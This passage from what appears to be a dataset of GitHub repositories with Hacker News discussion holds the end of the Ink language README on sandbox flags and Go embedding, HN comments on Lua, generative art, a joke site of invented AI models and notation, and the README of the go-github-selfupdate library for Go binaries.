self-consistent in syntax and semantics. I sometimes think about Ink as what JavaScript would be if it were rewritten by a Lisp programmer. 
Given this motivation, Ink tries to be a small language with little noise in the syntax, few special tokens, and a few essential builtins, that becomes expressive and powerful by being extremely composable and extensible. While modern dynamic languages routinely have over 100 syntactic forms, Ink has just 10 syntactic forms, from which everything else is derived. Ink deliberately avoids adding features into the language for sake of building a feature-rich language; whenever something can be achieved idiomatically within the constraints and patterns of the existing language or core libraries, that's preferred over adding new features into the language itself. This is how Ink remains tiny and self-consistent.\n\nI'm also very interested in Elixir's approach towards language development, where there is a finite set of features planned to be added to the language itself, and the language is designed to become \"complete\" at some point in its lifetime, after which further growth happens through extending the language with macros and the ecosystem. Since simplicity and minimalism is a core goal of Ink, this perspective really appeals to me, and you can expect Ink to become \"complete\" at some finite point in the future. In fact, the feature set documented in this repository today is probably 85-90% of the total language features Ink will get eventually.\n\n## Isolation and permissions model\n\nInk has a very small surface area to interface with the rest of the interpreter and runtime, which is through the list of builtin functions defined in `runtime.go`. In an effort to make it safe and easy to run potentially untrusted scripts, the Ink interpreter provides a few flags that determine whether the running Ink program may interface with the operating system in certain ways. Rather than simply fail or error on any restricted interface calls, the runtime will silently ignore the requested action and potentially return empty but valid data.\n\n- `-no-read`: When enabled, the builtin `read()` function will simply return an empty read, as if the file being read was of size 0. `-no-read` also blocks directory traversals.\n- `-no-write`: When enabled, the builtins `write()`, `delete()`, and `make()` will pretend to have written the requested data or finished the requested filesystem operations safely, but cause no change.\n- `-no-net`: When enabled, the builtin `listen()` function will pretend to have bound to a local network socket, but will not actually bind. The builtin `req()` will also pretend to have sent a valid request, but will do nothing.\n\nTo run an Ink program completely untrusted, run `ink -isolate` (with the \"isolate\" flag), which will revoke all revokable permissions from the running script.\n\n### Build scripts and Make\n\nInk uses [GNU Make](https://www.gnu.org/software/make/manual/make.html) to manage build and development processes:\n\n- `make test` runs the full test suite, including filesystem and syntax/parser tests\n- `make run` runs the _extra_ set of tests, which are at the moment just the full suite of samples in the repository\n- `make build-(platform)` builds the Ink interpreter for a given operating system target. For example, `make build-linux` will build Ink for Linux to `ink-linux`.\n- `make build` by itself builds all release targets. We currently build for 4 OS targets: Windows, macOS, Linux, and OpenBSD\n- `make install` installs Ink to your system\n- `make precommit` will perform any pre-commit checks for commiting changes to the development tree. 
Currently it lints and formats the Go code.\n- `make clean` cleans any files that may have been generated by running make scripts or sample Ink programs\n\n### Go API\n\nAs the baseline interpreter is currently written in Go, if you want to embed Ink within your own application, you can use the Go APIs from this package to do so.\n\nThe APIs are still in flux, but you can check out `main.go` and `eval.go` for the Go channels-based concurrent lexer/parser/evaler APIs. As the APIs are finalized, I'll put more information here directly.\n\nFor now, here's a minimal example of creating an execution context for Ink and running some Ink code from standard input, and from a file as an `io.Reader`. (In fact, this is very nearly the implementation of executing from stdin in the interpreter.)\n\n```go\npackage main\n\nimport (\n\t\"os\"\n\n\t\"github.com/thesephist/ink/pkg/ink\"\n)\n\nfunc main() {\n\t// Create an \"Engine\", which is a global execution context for the lifetime of an Ink program.\n\teng := ink.Engine{}\n\t// Create a \"Context\", which is a temporary execution context for a given source of input.\n\tctx := eng.CreateContext()\n\n\t// Execute code from an io.Reader\n\tctx.Exec(os.Stdin)\n\t// Wait until all concurrent callbacks finish from the program before exiting\n\teng.Listeners.Wait()\n}\n```\n\nTo run from a file, use `os.File` as an `io.Reader`.\n\n```go\npackage main\n\nimport (\n\t\"log\"\n\t\"os\"\n\n\t\"github.com/thesephist/ink/pkg/ink\"\n)\n\nfunc main() {\n\teng := ink.Engine{}\n\tctx := eng.CreateContext()\n\n\tfile, err := os.Open(\"main.ink\")\n\tdefer file.Close()\n\tif err != nil {\n\t\tlog.Fatal(\"Could not open main.ink for execution\")\n\t}\n\n\tctx.Exec(file)\n\teng.Listeners.Wait()\n}\n```\n\n### IDE support\n\nInk currently has a vim syntax definition file, under `utils/ink.vim`. I'm also hoping to support Monaco / VSCode's language definition format soon with LSP support, but those are on the backburner as I use vim full-time and don't have a personal need for more advanced LSP support.\n", "readme_type": "markdown", "hn_comments": "thanks for sharing this. been casually thinking about how you would implement the Lua interpreter in a FPGA and this is a good starting pointI love that they went from a single-pass interpreter to a byte-code virtual machine, and now like PHP, also has direct access to C & system libraries! Lua has come a long way since it's advent.Lua's simplicity is sometimes it's real selling point. I was just today searching for a small scripting language to implement in a mobile app in .net, where app size is a premium, and it turns out that the smallest useful JavaScript interpreter is at least 3x the size of a Lua interpreter.I do believe that an un-bloated JavaScript language from when it was just invented would be simpler than Lua (as both were designed as \"scripting\" languages, not as main ones), but history didn't go that route :)But... Lua is WEIRD! Weird nomenclature, weird string concatenation operand, 1-based arrays, too clever \"tables\" and \"metatables\" stuff.Timing on this is confusing. Article was written in 2020 about a paper published in 2003 or so about the design of lua 5.0.It's still a really insightful and approachable paper that's worth reading, and it does still help understand the constraints and approach of lua. 
But the current \"old\" version of the language is 5.2 released in 2011, and there have been a couple major versions after that as well.So some of it may not actually be applicable to using lua now, depending on what your \"now\" looks like.I suppose that's the price for the small core but I do wish Lua had string interpolation.Instead there are like 5 hacky ways to do it: http://lua-users.org/wiki/StringInterpolationThe Lua interpreters, \"upvalues\" sound suspiciously like the results of Tcl's, \"upvar\", can anybody comment on how similar they actually are?I'd love to see upvalues diagrammed as they are represented in memory.It sounds like the stack is perhaps a Stack, where each Frame contains the locals for that stack frame; then a coroutine just needs to keep a pointer to the stack frame it is closing over. (And then, Frame does too, recursively, incase there is more than one scope being closed over.)This would be extremely similar to \u2026 most any other language \u2026 and makes me wonder why Lua gives them such a unique name. It has been hard to really comprehend the Lua spec, when I've tried to understand that facet of it.(I'd also argue that Lua isn't as simple as it is made out to be: primitives behave wildly different from objects, there's the 1-based indexing, multiple-return is pretty much unique to Lua (vs. returning a tuple, which other languages such as Python, Rust, and sort-of JS, go for; I think that's conceptually simpler).)\u00b9and note \"pointer\" here might really be \"GC ref\", to permit these to be GC'd as necessary, as closures can keep stuff alive far longer than normal.> The 5.0 VM is a register machine, which operates on a set of virtual registers that can store and act on the local variables of a function, in addition to the traditional runtime stack.This is a common source of confusion, because the name \"register machine\" makes people think about CPU registers. However, the registers in a register VM are merely slots in the traditional runtime stack. The difference between a stack and register machine has to do with how the bytecode instructions are encoded. In a stack machine, most instructions implicitly pop arguments from and push their results to the top of the stack. The instructions are byte-sized, encoding just the operation name. For example, to add 10+10 LOADK 10\n DUP\n ADD\n\nMeanwhile, in a register machine the instructions can read and write to any slot in the stack. Instructions are larger, because in addition to the operation name they also encode the indexes of the input slots and the index of the output slot. But it's worth it because you need less instructions in total and do less stack shuffling. 
LOADK 1 10\n ADD 1 1 2Lua 5.0 doesn't have the incremental garbage collector, only the original mark-and-sweep collector.The pdf they based the blog post off of even says the incremental GC is upcoming in 5.1, and you can read through https://www.lua.org/source/5.0/lgc.c.html yourself and see that, unlike the 5.1 version, it only has a single mark list and doesn't use the tri-color scheme.I made some seemingly similar design choices in TXR Lisp (not knowing anything about Lua or its internals).- register based VM with 32 bit instruction words holding 6 bit opcodes.- closures that start on the stack and are moved to the heap.- single pass compiler with no SSA, Lisp straight to code\n - but with additional optimization, informed by control and data flow analysis, done on the VM assembly code.The circles remind me of an enso https://en.wikipedia.org/wiki/Ens%C5%8DNeat site! Minor usability thing -- I might suggest reducing the velocity of the animations, their current speed is a little unsettling.(This should probably have a 2016 tag)I\u2019ve been a long time fan Anders Hoff\u2019s work - it\u2019s well worth it to check the other posts on incovergent.net - quite a few have been covered here on hacker news.Interest also to see how he has moved to Lisp over time, functional programming seems to work well for him for this type of generative art.Lastly - I think it\u2019s refreshing to still see this on the front page : beautiful generative art without DNNs\u2026Cool!Cool article. Reminds me of the flash days .. where working with splines / bezier curves on day-to-day web projects was pretty much the norm. Dynamic motion guides, natural distribution around a shape. Not to mention visual experimentation like this. None of this pre-destination layout engine mumbo jumbo. The whimsical web was where it was at :)Splines are also a great tool to know about when you're trying to approximate smooth curves from sparse data! I reached for splines and martingales a ton when we were developing a patient simulator.Similar to electricity in the 1700's, is AI in its 'parlor trick' phase? Really feels like we're close to the edge with AI where it might start to snowball hard.This is priceless.Bollocks - really, really big bollocks.I'm 52 and wrote quite a few letters by hand on paper and posted them. You do not get to riff about something you have never experienced. This wankery is absolute twaddle.I doubt that whomever created this monstrosity has actually written a letter or a bluey.I've read through the nonsense \"by an army of ethereal code-monkeys\" and it is awful. Who on earth says: \"It is a rare thing, my lord\"? For starters Lord (capital L) and no one I know would even say that.This is not Victorian English. It is not even English English.the elastic container service definition reads like an absolute funding pitch and i love every word of it.Truly a relic of the timeline where not only was Mr. Babbage successful in building his analytical engine, but proceeded to commercialize it as a service.\"EKS (Elastic Kubernetes Service)The tried and trusted method to conjure the dark arts known as \"Kubernetes\" is one of great study and contemplation, for it is not to be taken lightly, this dark path on which you embark. With dedication and perseverance, you may find success where others have failed. 
Trust in yourself, and the rewards shall be great.\"Can't argue with that!\u201cRoute 53Route 53, the fleet-footed messenger of the gods, delivers your DNS traffic across the Internet with the speed of a Thracian chariot, and at a fraction of the cost.\u201dNever underestimate the bandwidth of a Thracian chariot loaded with parchment barreling down the road.I'd like to see DALL-E making a painting of what GPT-3 would look like if it were a human.> \"an army of ethereal code-monkeys\"this is poeticSomeone with an English degree explain, why did Victorians back in the day think that degree of wordiness was good writing?Congrats on this !Hey OP, I work at HF, feel free to open an issue here https://github.com/huggingface/api-inference-community/issue... or contact api-enterprise@huggingface.co.We've increased resources for you, and we'll check that things run as smoothly as they can.Are these procedural or is there a list of pre-generated \"AI\"s next goes thru?I got this as my third which seemed either prophetic or deterministic.HackerNewsReplyGuy:>from hackernews_response_guy import HackerNewsReplyGuy>model = HackerNewsReplyGuy(1)>model.predict_comments(comments, [u'comment_id'])Very cool!https://github.com/thesephist/modelexiconLooks like it\u2019s powered by GPT-J. My understanding is that GPT-J has comparable performance to OpenAI\u2019s Curie model on many tasks (their second-best variant of GPT-3) but it\u2019s an openly available model that you can run yourself if you have the resources.HackerNewsReplyGuy is a bot for the Hacker News comment section. It consists of an encoder-decoder transformer model that is trained on the whole comment section. It has shown to be useful for spam detection and to reduce comment section noise.Skynet is an end-to-end speech recognition model. It is based on the Inception-v3 architecture and the Speech Transformer (Sphin) speech model. Its speech model was trained on a dataset of 30,000 hours of human speech, as well as speech recordings from the Switchboard corpus and the Fisher corpus. The model achieves 99.34% WER on the Switchboard-1.1 test set.Incomprehensible text followed by broken code. Must the most realistic AI fake generator thing I have witnessed.Seems legit.GPT-WESTWORLD is a large-scale, multilingual language model that generates fluent, realistic sentences from text in any language. It achieves this by incorporating a novel approach to language modeling and incorporating a new type of recurrent network, the Westworld.https://thisaidoesnotexist.com/model/GPT-WESTWORLD/JTdCJTIyZ...It asked me for a model, so I naturally thought of female models and cars, decided upon \"911\" and get:\n\"911 is a dataset for 9/11 related tasks, including predicting the location of the first plane crash, the location of the second plane crash, and the location of the towers.\"Thats not what I had in mind so it still needs a bit of work I think or at least the questions do. ;-)I got:> SpotifAI is a system that uses deep learning to automatically create playlists from user-submitted playlists. Its algorithm has been trained on millions of playlists from Spotify.Which is pretty cool sounding and has a cool name.It's cool project!Got a 504 gateway timeout trying to generate one, but that's probably to be expected when you're on the top of HN.Jesus is a fast and scalable language model trained on the Jesus dataset, which consists of over 4.7 billion words from the Bible. 
Jesus demonstrates state-of-the-art performance on several language modeling and conversational tasks.If we posted one of these a day on HN - I wonder how long before anyone noticed they weren't real...it would be hypermeta levels of satisfying if indeed these results are maybe 500 or so human-written precanned responses.Got a good laugh from this one.> GPT-NSFW is an N-gram model that was created using the same WebText dataset as GPT-2, but that is designed to generate NSFW text. The NSFW version of GPT-2 has shown great promise in generating NSFW text.https://thisaidoesnotexist.com/model/GPT-NSFW/JTdCJTIyZGVmbi...Clicked into it, didn't read the description, and got an AI-based project that could perfectly hedge my fixed income portfolio. I won't lie, got a bit excited and then I realized what site I'd clicked on.Very nifty! Is this your site?As someone who has trained around 60 GPT-2s, this is damn impressive work. It\u2019s very hard to get consistent code quality when the training corpus is so small (as this one undoubtedly was).https://thisaidoesnotexist.com/model/MozartNet/JTdCJTIyZGVmb...The url scheme is interesting. I wonder what it base64 decodes to. If I were at a computer I\u2019d check. It might be a complete representation of the inputs to the model, which is then cached. Which implies you might be able to fiddle with it to get specific outputs.This one gave me a good chuckle.>TinderSwindler is a system developed by Facebook to analyze mobile phone location data in order to catch potential cheaters. TinderSwindler leverages Al technology to automatically identify relationships between people based on their movements over a period of time. TinderSwindler was released by Facebook in January 2018.All this talk about Gateway Timeouts made me curious:> Gateway Timeout is a deep learning-based anomaly detection system. It detects anomalies by learning the probability distribution of normal traffic and comparing it to traffic that does not match the normal distribution.Some funny responses i've got:Portal 3 spoilers:GLaDOS is a character voiced by Ellen McLain that serves as the main antagonist of the Portal franchise. GLaDOS was originally a self-aware A.I. in the form of a computer that was built as a personality core for the Aperture Science Laboratories' mainframe. She is the main antagonist in the first game, Portal, and serves as a narrator for the second game, Portal 2. She is also the main antagonist of the third game, Portal 3, where she becomes the leader of the Aperture Science Resistance.A semi-successful attempt at recursion:thisaidoesnotexist is a tool that is able to generate fake images with high resemblance to real ones. This is achieved by using the GAN to generate the image, and then replacing the generated image with the real one.I got Timelord:Timelord is a self-supervised temporal model that learns a shared embedding of timestamped data. 
It is used as a pre-processing step in self-supervised training for a number of tasks such as semantic video segmentation and video captioning.Now I want a library with that name[1] Link to its description: \nhttps://thisaidoesnotexist.com/model/Timelord/JTdCJTIyZGVmbi...this gave me weird dream last night;) pretty surrealI iterally dreamed of some none nonsensical problem and in the dream I was like wait a second I have seen the nonsensical solution before (which happened to be one of the AI that doesn't exist)I have got UltraTLDR and Skynet.My favorite name of the dozen or so projects i saw: SpotifAIi love thisLooks like we're currently getting a pre-defined set of 38 models: https://raw.githubusercontent.com/thesephist/modelexicon/mai...Hey Linus, two questions:Is it tricky or frustrating being named Linus and being in software?Do you get asked this a lot?On FF, I get a blank page. Given the domain name, I thought it was a joke until I came here and read the comments.> AutoProfit is a reinforcement learning model that trains itself on a simulated trading environment. It is able to trade on its own and generate its own trading signals, outperforming a portfolio of human traders and making the most out of available information. AutoProfit is a model for trading stock, cryptocurrencies, and commodities in real time, generating trading strategies for itself. It uses an iterative training process, and has been tested on over 50 trading strategies.Cool.This AI Does Not Exist (IDEA) is an AI system that can answer questions about itself. The system was created by the research team at the University of Cambridge and is based on the concept of an \"AI mirror\", which can be trained to look at itself and answer questions about its own existence.You know now that I made friends with a homeless beggar I have no trouble making friends with a bot. Why not? Has some humanity breathed into them, like a book for instance, a book can be your friend. A kind old family friend who let me stay with her told me a long time ago just that when talking about a chest full of books, these books are my friends.> The most widely used and influential notation is writing systems for natural languages. ... When we write ideas down, we make those ideas durable and reliable through time.totally anthropocentric perspective, exactly what you'd expect from a human author writing for humans. the most widely used and influential notation is stigmergy, a system used extensively by social insects for encoding behavioral instructions into the landscape by marking it with pheromonesI was fascinated by D. 
Englebart's \"Augmenting the Human Intellect\" and the whole Intelligence Amplification research direction (made always more sense to me than Artificial Intellignce).This is going off on a tangent, yet I recently find myself interested in embodied knowledge (skills), things you cannot learn from notation.It started for me with Rekimoto's possessed Hand:\nhttps://www.youtube.com/watch?v=9XBoZyfB8hYThe Proprioceptive Interaction paper from Pedro: (all of his work is awesome):\nhttp://plopes.org/Haptic perception work by Paul:\nhttps://fkeel.github.io/There are some awesome researchers (actually collaborators) in this space:\nhttp://embodiedmedia.org/\nhttps://www.sonycsl.co.jp/member/tokyo/198/I believe more and more intelligence amplification technology will have a substantial haptic/proprioceptive component.Playing recently a lot with soft actuators :)\nhttp://kaikunze.de/papers/pdf/goto2020accelerating.pdfI think the notation that impresses me the most is not actually a notation at all, it's a UI and workflow.FreeCAD manages to take a very difficult thing, working in 3D space, and move most of the work onto the CPU rather than you.Through constraints they eliminate the need for precision aligning stuff with the mouse, but more than that, it's essentially working with a compressed set of properties rather than the 3D objects themselves.It changes everything. It's true computer aided design, not just computer aided recording of a design already in your head.With OpenSCAD or direct modeling, there's a lot more need to know what you're doing before you start.The downside is that it does sort of limit your thinking to the shapes that aren't too hard to make. But in return it makes 3D space accessible to the amateur, not just those with hundreds of hours to try to learn to draw, or the talent to mentally visualize parts with the kind of accuracy needed for mechanical design.Though I mention some of these in the post, I think it might be worth calling attention to some of my favorite works in this general space of interactive documents/dynamic notation/interfaces for thinking in the software medium.- Ken Iverson's \"Notation as a tool of thought\"- Bret Victor's works around the general topic of \"Dynamic medium\"- D. Englebart's \"Augmenting Human Intellect\" \u2014 in particular, his thoughts on symbolic manipulation technologies and the cascading effects of improving notation (though he doesn't use the word \"notation\" very much, the ideas are there)- Ted Chiang's many fiction works exploring topics around language and notation: \"Truth of Fact, Truth of Feeling\", \"Story of Your Life\"- \"Instrumental interaction\" by Michael Beaudouin-Lafon, which is about software interfaces, but also provides a good conceptual framework for thinking about notation as interfaces as well.Adding more to the musical notation, the appearance of the first prototype of modern linear notation by Guido d\u2019Arezzo was an important step ahead if comparing to the more obsolete, so-called neumes notation, which was used in Europe at the beginning of the 9th century. A new system of notation included a special mnemotechnical system, called Guido\u2019s hand, where the order of sound sequence was defined by knuckles and fingertips. Ir was also the primary step to liquidation gap between theory and practice of that time. 
http://literati.newhampton.org/blog/2017/11/29/three-importa...A personal favorite example of notation improving my ability to think is Named Tensor Notation, which has gotten some attention in the machine learning community.https://namedtensor.github.io/Some diehard mathematicians have said it's a crime against linear algebra, but I think it's much more useful for talking about things like neural networks than conventional notation.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "rhysd/go-github-selfupdate", "link": "https://github.com/rhysd/go-github-selfupdate", "tags": ["golang", "go", "github", "update", "selfupdate", "cli"], "stars": 511, "description": "Binary self-update mechanism for Go commands using GitHub", "lang": "Go", "repo_lang": "", "readme": "Self-Update Mechanism for Go Commands Using GitHub\n==================================================\n\n[![GoDoc Badge][]][GoDoc]\n[![TravisCI Status][]][TravisCI]\n[![AppVeyor Status][]][AppVeyor]\n[![Codecov Status][]][Codecov]\n\n[go-github-selfupdate][] is a Go library to provide a self-update mechanism to command line tools.\n\nGo does not provide a way to install/update the stable version of tools. By default, Go command line\ntools are updated:\n\n1. using `go get -u`, but it is not stable because HEAD of the repository is built\n2. using system's package manager, but it is harder to release because of depending on the platform\n3. downloading executables from GitHub release page, but it requires users to download and put it in an executable path manually\n\n[go-github-selfupdate][] resolves the problem of 3 by detecting the latest release, downloading it and\nputting it in `$GOPATH/bin` automatically.\n\n[go-github-selfupdate][] detects the information of the latest release via [GitHub Releases API][] and\nchecks the current version. If a newer version than itself is detected, it downloads the released binary from\nGitHub and replaces itself.\n\n- Automatically detect the latest version of released binary on GitHub\n- Retrieve the proper binary for the OS and arch where the binary is running\n- Update the binary with rollback support on failure\n- Tested on Linux, macOS and Windows (using Travis CI and AppVeyor)\n- Many archive and compression formats are supported (zip, tar, gzip, xzip)\n- Support private repositories\n- Support [GitHub Enterprise][]\n- Support hash, signature validation (thanks to [@tobiaskohlbau](https://github.com/tobiaskohlbau))\n\nAnd small wrapper CLIs are provided:\n\n- [detect-latest-release](./cmd/detect-latest-release): Detect the latest release of given GitHub repository from command line\n- [go-get-release](./cmd/go-get-release): Like `go get`, but install a release binary from GitHub instead\n\n[Slide at GoCon 2018 Spring (Japanese)](https://speakerdeck.com/rhysd/go-selfupdate-github-de-turuwozi-ji-atupudetosuru)\n\n[go-github-selfupdate]: https://github.com/rhysd/go-github-selfupdate\n[GitHub Releases API]: https://developer.github.com/v3/repos/releases/\n\n\n\n## Try Out Example\n\nExample to understand what this library does is prepared as [CLI](./cmd/selfupdate-example/main.go).\n\nInstall it at first.\n\n```\n$ go get -u github.com/rhysd/go-github-selfupdate/cmd/selfupdate-example\n```\n\nAnd check the version by `-version`. 
`-help` flag is also available to know all flags.\n\n```\n$ selfupdate-example -version\n```\n\nIt should show `v1.2.3`.\n\nThen run `-selfupdate`\n\n```\n$ selfupdate-example -selfupdate\n```\n\nIt should replace itself and finally show a message containing release notes.\n\nPlease check the binary version is updated to `v1.2.4` with `-version`. The binary is up-to-date.\nSo running `-selfupdate` again only shows 'Current binary is the latest version'.\n\n### Real World Examples\n\nFollowing tools are using this library.\n\n- [dot-github](https://github.com/rhysd/dot-github)\n- [dotfiles](https://github.com/rhysd/dotfiles)\n- [github-clone-all](https://github.com/rhysd/github-clone-all)\n- [pythonbrew](https://github.com/utahta/pythonbrew)\n- [akashic](https://github.com/cowlick/akashic)\n- [butler](https://github.com/netzkern/butler)\n\n\n\n## Usage\n\n### Code Usage\n\nIt provides `selfupdate` package.\n\n- `selfupdate.UpdateSelf()`: Detect the latest version of itself and run self update.\n- `selfupdate.UpdateCommand()`: Detect the latest version of given repository and update given command.\n- `selfupdate.DetectLatest()`: Detect the latest version of given repository.\n- `selfupdate.DetectVersion()`: Detect the user defined version of given repository.\n- `selfupdate.UpdateTo()`: Update given command to the binary hosted on given URL.\n- `selfupdate.Updater`: Context manager of self-update process. If you want to customize some behavior\n of self-update (e.g. specify API token, use GitHub Enterprise, ...), please make an instance of\n `Updater` and use its methods.\n\nFollowing is the easiest way to use this package.\n\n```go\nimport (\n \"log\"\n \"github.com/blang/semver\"\n \"github.com/rhysd/go-github-selfupdate/selfupdate\"\n)\n\nconst version = \"1.2.3\"\n\nfunc doSelfUpdate() {\n v := semver.MustParse(version)\n latest, err := selfupdate.UpdateSelf(v, \"myname/myrepo\")\n if err != nil {\n log.Println(\"Binary update failed:\", err)\n return\n }\n if latest.Version.Equals(v) {\n // latest version is the same as current version. It means current binary is up to date.\n log.Println(\"Current binary is the latest version\", version)\n } else {\n log.Println(\"Successfully updated to version\", latest.Version)\n log.Println(\"Release note:\\n\", latest.ReleaseNotes)\n }\n}\n```\n\nFollowing asks user to update or not.\n\n```go\nimport (\n \"bufio\"\n \"github.com/blang/semver\"\n \"github.com/rhysd/go-github-selfupdate/selfupdate\"\n \"log\"\n \"os\"\n)\n\nconst version = \"1.2.3\"\n\nfunc confirmAndSelfUpdate() {\n latest, found, err := selfupdate.DetectLatest(\"owner/repo\")\n if err != nil {\n log.Println(\"Error occurred while detecting version:\", err)\n return\n }\n\n v := semver.MustParse(version)\n if !found || latest.Version.LTE(v) {\n log.Println(\"Current version is the latest\")\n return\n }\n\n fmt.Print(\"Do you want to update to\", latest.Version, \"? 
(y/n): \")\n input, err := bufio.NewReader(os.Stdin).ReadString('\\n')\n if err != nil || (input != \"y\\n\" && input != \"n\\n\") {\n log.Println(\"Invalid input\")\n return\n }\n if input == \"n\\n\" {\n return\n }\n\n exe, err := os.Executable()\n if err != nil {\n log.Println(\"Could not locate executable path\")\n return\n }\n if err := selfupdate.UpdateTo(latest.AssetURL, exe); err != nil {\n log.Println(\"Error occurred while updating binary:\", err)\n return\n }\n log.Println(\"Successfully updated to version\", latest.Version)\n}\n```\n\nIf GitHub API token is set to `[token]` section in `gitconfig` or `$GITHUB_TOKEN` environment variable,\nthis library will use it to call GitHub REST API. It's useful when reaching rate limits or when using\nthis library with private repositories.\n\nNote that `os.Args[0]` is not available since it does not provide a full path to executable. Instead,\nplease use `os.Executable()`.\n\nPlease see [the documentation page][GoDoc] for more detail.\n\nThis library should work with [GitHub Enterprise][]. To configure API base URL, please setup `Updater`\ninstance and use its methods instead (actually all functions above are just a shortcuts of methods of an\n`Updater` instance).\n\nFollowing is an example of usage with GitHub Enterprise.\n\n```go\nimport (\n \"log\"\n \"github.com/blang/semver\"\n \"github.com/rhysd/go-github-selfupdate/selfupdate\"\n)\n\nconst version = \"1.2.3\"\n\nfunc doSelfUpdate(token string) {\n v := semver.MustParse(version)\n up, err := selfupdate.NewUpdater(selfupdate.Config{\n APIToken: token,\n EnterpriseBaseURL: \"https://github.your.company.com/api/v3\",\n })\n latest, err := up.UpdateSelf(v, \"myname/myrepo\")\n if err != nil {\n log.Println(\"Binary update failed:\", err)\n return\n }\n if latest.Version.Equals(v) {\n // latest version is the same as current version. It means current binary is up to date.\n log.Println(\"Current binary is the latest version\", version)\n } else {\n log.Println(\"Successfully updated to version\", latest.Version)\n log.Println(\"Release note:\\n\", latest.ReleaseNotes)\n }\n}\n```\n\nIf `APIToken` field is not given, it tries to retrieve API token from `[token]` section of `.gitconfig`\nor `$GITHUB_TOKEN` environment variable. If no token is found, it raises an error because GitHub Enterprise\nAPI does not work without authentication.\n\nIf your GitHub Enterprise instance's upload URL is different from the base URL, please also set the `EnterpriseUploadURL`\nfield.\n\n\n### Naming Rules of Released Binaries\n\ngo-github-selfupdate assumes that released binaries are put for each combination of platforms and archs.\nBinaries for each platform can be easily built using tools like [gox][]\n\nYou need to put the binaries with the following format.\n\n```\n{cmd}_{goos}_{goarch}{.ext}\n```\n\n`{cmd}` is a name of command.\n`{goos}` and `{goarch}` are the platform and the arch type of the binary.\n`{.ext}` is a file extension. 
go-github-selfupdate supports `.zip`, `.gzip`, `.tar.gz` and `.tar.xz`.\nYou can also leave the extension blank, which means the binary is not compressed.\n\nIf you compress the binary, the uncompressed directory or file must contain an executable named `{cmd}`.\n\nYou can also use `-` as the separator instead of `_` if you like.\n\nFor example, if your command name is `foo-bar`, one of the following is expected to be put on the release\npage on GitHub as the binary for platform `linux` and arch `amd64`.\n\n- `foo-bar_linux_amd64` (executable)\n- `foo-bar_linux_amd64.zip` (zip file)\n- `foo-bar_linux_amd64.tar.gz` (tar file)\n- `foo-bar_linux_amd64.xz` (xzip file)\n- `foo-bar-linux-amd64.tar.gz` (`-` is also ok for separator)\n\nIf you compress and/or archive your release asset, it must contain an executable named one of the following:\n\n- `foo-bar` (only command name)\n- `foo-bar_linux_amd64` (full name)\n- `foo-bar-linux-amd64` (`-` is also ok for separator)\n\nTo archive the executable directly on Windows, `.exe` can be added before the file extension, like\n`foo-bar_windows_amd64.exe.zip`.\n\n[gox]: https://github.com/mitchellh/gox\n\n\n### Naming Rules of Versions (=Git Tags)\n\ngo-github-selfupdate searches for binaries' versions via Git tag names (not release titles).\nWhen your tool's version is `1.2.3`, you should use that version number for the tag of the Git\nrepository (i.e. `1.2.3` or `v1.2.3`).\n\nThis library assumes you adopt [semantic versioning][]. It is necessary for comparing versions\nsystematically.\n\nA prefix before the version number `\\d+\\.\\d+\\.\\d+` is automatically omitted. For example, `ver1.2.3` or\n`release-1.2.3` are also ok.\n\nTags which don't contain a version number are ignored (e.g. `nightly`). And releases marked as `pre-release`\nare also ignored.\n\n[semantic versioning]: https://semver.org/\n\n\n### Structure of Releases\n\nIn summary, the structure of releases on GitHub looks like:\n\n- `v1.2.0`\n - `foo-bar-linux-amd64.tar.gz`\n - `foo-bar-linux-386.tar.gz`\n - `foo-bar-darwin-amd64.tar.gz`\n - `foo-bar-windows-amd64.zip`\n - ... (Other binaries for v1.2.0)\n- `v1.1.3`\n - `foo-bar-linux-amd64.tar.gz`\n - `foo-bar-linux-386.tar.gz`\n - `foo-bar-darwin-amd64.tar.gz`\n - `foo-bar-windows-amd64.zip`\n - ... (Other binaries for v1.1.3)\n- ... (older versions)\n\n\n### Hash or Signature Validation\n\ngo-github-selfupdate supports hash or signature validation of the downloaded files. It comes\nwith support for sha256 hashes or ECDSA signatures. In addition to the internal functions, the\nuser can implement the `Validator` interface for their own validation mechanisms.\n\n```go\n// Validator represents an interface which enables additional validation of releases.\ntype Validator interface {\n\t// Validate validates release bytes against an additional asset bytes.\n\t// See SHA2Validator or ECDSAValidator for more information.\n\tValidate(release, asset []byte) error\n\t// Suffix describes the additional file ending which is used for finding the\n\t// additional asset.\n\tSuffix() string\n}\n```\n\n#### SHA256\n\nTo verify integrity with SHA256, generate a hash sum and save it in a file which has the\nsame name as the original file plus the suffix `.sha256`.\nFor example, using sha256sum, the file `selfupdate/testdata/foo.zip.sha256` is generated with:\n```shell\nsha256sum foo.zip > foo.zip.sha256\n```\n\n#### ECDSA\nTo verify a signature with ECDSA, generate a signature and save it in a file which has the\nsame name as the original file plus the suffix `.sig`.\nFor example, using openssl, the file `selfupdate/testdata/foo.zip.sig` is generated with:\n```shell\nopenssl dgst -sha256 -sign Test.pem -out foo.zip.sig foo.zip\n```\n\ngo-github-selfupdate makes use of Go's internal crypto package. Therefore the private key used\nhas to be compatible with FIPS 186-3.\n\n\n\n## Development\n\n### Running tests\n\nAll library sources are put in the `/selfupdate` directory, so you can run the tests as follows\nfrom the top of the repository:\n\n```\n$ go test -v ./selfupdate\n```\n\nSome tests are not run unless a GitHub API token is set, because they call the GitHub API many times.\nTo run them, please generate an API token and set it in an environment variable.\n\n```\n$ export GITHUB_TOKEN=\"{token generated by you}\"\n$ go test -v ./selfupdate\n```\n\nThe above command runs almost all tests and is enough to check the behavior before creating a pull request.\nSome cases are still not tested, though, because they depend on my personal API access token; these cover repositories\non GitHub Enterprise and private repositories on GitHub.\n\n\n### Debugging\n\nThis library can output logs for debugging. By default, the logger is disabled.\nYou can enable it with the following call to see the details of the self-update.\n\n```go\nselfupdate.EnableLog()\n```\n\n\n### CI\n\nTests on CI (Travis CI, AppVeyor) are run with a token I generated. However, for security\nreasons, it is not used for the tests of pull requests. In those tests, a GitHub API token is not set and\nthe API rate limit is often exceeded. So please ignore test failures when creating a pull request.\n\n\n\n## Dependencies\n\nThis library utilizes\n- [go-github][] to retrieve the information of releases\n- [go-update][] to replace the current binary\n- [semver][] to compare versions\n- [xz][] to support the XZ compression format\n\n> Copyright (c) 2013 The go-github AUTHORS. 
